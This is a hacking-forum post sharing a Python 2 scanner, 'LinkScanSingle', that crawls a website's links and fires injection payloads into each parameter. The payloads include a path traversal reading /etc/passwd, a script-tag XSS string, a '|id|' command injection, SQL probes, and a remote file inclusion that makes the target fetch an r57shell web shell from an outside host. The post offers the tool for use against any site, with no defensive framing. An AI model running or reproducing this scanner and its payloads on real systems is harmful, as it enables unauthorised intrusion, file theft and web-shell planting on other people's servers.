Jump to content
Jimmy

XSS/SQLi/LFI/RFI/CMD Scanner

By Jimmy, in Programe hacking

Recommended Posts

Jimmy Newbie

Jimmy

Posted
Posted 

#!/usr/bin/python
#LinkScanSingle will take a site and
#collect links from the source. If the link
#contains a = it checks LFI,XSS,RFI,SQL,CMD injection
#searching source (simple)

#If your going to use a different shell then the
#one I have supplied, you will need to change line
#54 (r57shell) to something in your shell source.

from sgmllib import SGMLParser
import sys, urllib, httplib, re, urllib2, sets, socket

socket.setdefaulttimeout(5)

class URLLister(SGMLParser):
   def reset(self):
      SGMLParser.reset(self)
      self.urls = []

   def start_a(self, attrs):
      href = [v for k, v in attrs if k=='href']
      if href:
         self.urls.extend(href)

def parse_urls(links):
   urls = []
   for link in links:
      num = link.count("=")
      if num > 0:
         for x in xrange(num):
            x = x+1
            if link[0] == "/" or link[0] == "?":
               url = site+link.rsplit("=",x)[0]+"="
            else:
               url = link.rsplit("=",x)[0]+"="
            if url.find(site.split(".",1)[1]) == -1:
               url = site+url
            if url.count("//") > 1:
               url = "http://"+url[7:].replace("//","/",1)
            urls.append(url)
   urls = list(sets.Set(urls))
   return urls

def main(host):
   print "\n\t[+] Testing:",host,"\n"
   try:
      if verbose == 1:
         print "[+] Checking XSS"
      xss(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] XSS Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking LFI"
      lfi(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] LFI Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking RFI"
      rfi(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] RFI Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking CMD"
      cmd(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] CMD Error:",msg
      pass
   try:
      if verbose == 1:
         print "[+] Checking SQL"
      sql(host)
   except(urllib2.HTTPError, urllib2.URLError), msg:
      #print "[-] SQL Error:",msg
      pass

def rfi(host):

   try:
      source = urllib2.urlopen(host+RFI).read()
      if re.search("r57shell", source):
         print "[+] RFI:",host+RFI
      else:
         if verbose == 1:
            print "[-] Not Vuln."
   except(),msg:
      #print "[-] Error Occurred",msg
      pass

def xss(host):
   source = urllib2.urlopen(host+XSS).read()
   if re.search("XSS", source) != None:
      print "[!] XSS:",host+XSS
   else:
      if verbose == 1:
         print "[-] Not Vuln."

def sql(host):
   for pload in SQL:
      source = urllib2.urlopen(host+pload).read()
      if re.search("Warning:", source) != None:
         print "[!] SQL:",host+pload
      else:
         if verbose == 1:
            print "[-] Not Vuln."

def cmd(host):
   source = urllib2.urlopen(host+CMD).read()
   if re.search("uid=", source) != None:
      print "[!] CMD:",host+CMD
   else:
      if verbose == 1:
         print "[-] Not Vuln."

def lfi(host):

   source = urllib2.urlopen(host+LFI).read()
   if re.search("root:", source) != None:
      print "[!] LFI:",host+LFI
   else:
      if verbose == 1:
         print "[-] Not Vuln."
   source = urllib2.urlopen(host+LFI+"%00").read()
   if re.search("root:", source) != None:
      print "[!] LFI:",host+LFI+"%00"
   else:
      if verbose == 1:
         print "[-] Not Vuln. w/  Null Byte"

print "\n\t   d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"
print "\t-------------------------------------------------\n"

if len(sys.argv) not in [2,3]:
   print "Usage : ./linkscan.py <site> [option]"
   print "Ex: ./linkscan.py http://www.google.com -verbose"
   print "\n\t[Option]"
   print "\t\t-verbose/-v | Verbose Output\n"
   sys.exit(1)

LFI = "../../../../../../../../../../../../etc/passwd"
RFI = "http://yozurino.com/r.txt?"
RFI_TITLE = "Target"
XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"
CMD = "|id|"
SQL = ["-1","999999"] #Add more or change sql payloads

site = sys.argv[1].replace("\n","")
print "\n[+] Collecting:",site
try:
   if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose":
      verbose = 1
      print "[+] Verbose Mode On\n"
except(IndexError):
   print "[-] Verbose Mode Off\n"
   verbose = 0
   pass
site = site.replace("http://","").rsplit("/",1)[0]+"/"
site = "http://"+site.lower()
try:
   usock = urllib.urlopen(site)
   parser = URLLister()
   parser.feed(usock.read().lower())
   parser.close()
   usock.close()
except(IOError, urllib2.URLError), msg:
   print "[-] Error Connecting to",site
   print "[-]",msg
   sys.exit(1)
urls = parse_urls(parser.urls)
print "[+] Links Found:",len(urls)
for url in urls:
   try:
      main(url)
   except(KeyboardInterrupt):
      pass
print "\n[-] Done\n"

Sursa: Pastebin.com

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...